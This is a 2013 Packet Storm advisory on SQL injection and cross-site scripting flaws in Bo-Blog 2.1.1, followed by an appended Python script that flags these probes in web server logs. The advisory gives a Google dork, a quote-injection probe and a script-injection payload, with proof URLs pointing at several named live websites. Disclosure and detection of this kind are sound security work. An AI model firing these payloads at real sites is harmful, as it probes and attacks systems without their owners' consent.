Bo-Blog 2.1.1 Cross Site Scripting / SQL Injection

2013-08-20T00:00:00
ID PACKETSTORM:122878
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-08-20T00:00:00

Description

                                        
`# Exploit Title : Bo-Blog 2.1.1 Multiple Vulnerabilities  
#****************************************************************************  
# Exploit Author : Ashiyane Digital Security Team  
#************************************************  
# Official site : http://www.bo-blog.com/  
# Tested on: Windows,Linux  
#*************************  
#  
#///////////////////////////////////////////////  
# Google Dork : intext:"Powered by Bo-Blog 2.1.1"  
#///////////////////////////////////////////////  
#  
# Exploit 1 : SQL Injection  
#  
# Location : /view.php?go=userlist&ordered=1[Sql Injection]  
#  
#  
# Proof:  
#  
# http://www.landsaywilson.com//view.php?go=userlist&ordered=1%27  
#  
# http://itaoblog.com/view.php?go=userlist&ordered=1%27  
#  
# http://www.9enjoy.com/view.php?go=userlist&ordered=1%27  
#  
# http://www.hongcn.com/en/view.php?go=userlist&ordered=1%27  
  
-----------------------------------------------------------------------------  
  
# Exploit 2 : Cross-Site Scripting  
#  
# Location : /view.php?go=userlist&ordered=1&usergroup=[xss]  
#  
# Location : /blog//view.php?go=userlist&ordered=1&usergroup=[xss]  
#  
#  
# Proof:  
#  
# http://itaoblog.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
#  
# www.landsaywilson.com//view.php?go=userlist&ordered=1&usergroup="/><script>alert(1);</script>  
#  
# http://www.boneboy.net/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
#  
# http://itlife365.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
#  
# http://www.hongcn.com/en/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
##############--------  
discovered by : ACC3SS  
##############--------  
`
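
A log-review sketch for the two request patterns listed above (`ordered` and `usergroup` on `/view.php?go=userlist`), added here as an example and not part of the original advisory or of Bo-Blog. It assumes combined-format access logs and that legitimate `ordered` values are digits only; the function names, finding labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.5 - - [20/Aug/2013:10:00:01 +0000] "GET /view.php?go=userlist&ordered=1 HTTP/1.1" 200 5120
203.0.113.9 - - [20/Aug/2013:10:00:07 +0000] "GET //view.php?go=userlist&ordered=1%27 HTTP/1.1" 200 812
203.0.113.9 - - [20/Aug/2013:10:00:09 +0000] "GET /blog//view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E HTTP/1.1" 200 5301
198.51.100.2 - - [20/Aug/2013:10:01:00 +0000] "GET /view.php?go=userlist&ordered=2&usergroup=1 HTTP/1.1" 200 5100
198.51.100.7 - - [20/Aug/2013:10:02:00 +0000] "GET /index.php?ordered=1%27 HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
DIGITS_RE = re.compile(r"[0-9]+")
MARKUP_RE = re.compile(r"[<>\"']")  # characters that break out of an HTML attribute


def classify(target):
    """Return findings for one request target (path plus query string)."""
    # Split by hand: a target such as "//view.php?..." would be misread by
    # urlsplit() as a host name with an empty path.
    path, _, query = target.partition("?")
    if not path.endswith("/view.php"):
        return []
    params = parse_qs(query)  # percent-decodes the values
    if "userlist" not in params.get("go", []):
        return []
    findings = []
    # Assumption: a legitimate `ordered` value is a plain decimal number.
    if any(not DIGITS_RE.fullmatch(v) for v in params.get("ordered", [])):
        findings.append("sqli-probe:ordered")
    if any(MARKUP_RE.search(v) for v in params.get("usergroup", [])):
        findings.append("xss-probe:usergroup")
    return findings


def scan(log_text):
    """Return (client_ip, finding) pairs for every matching log line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            hits.extend((m.group(1), f) for f in classify(m.group(2)))
    return hits


if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

The same two conditions (non-numeric `ordered`, markup characters in `usergroup`) are what server-side input validation and output encoding would need to reject or neutralise on this endpoint.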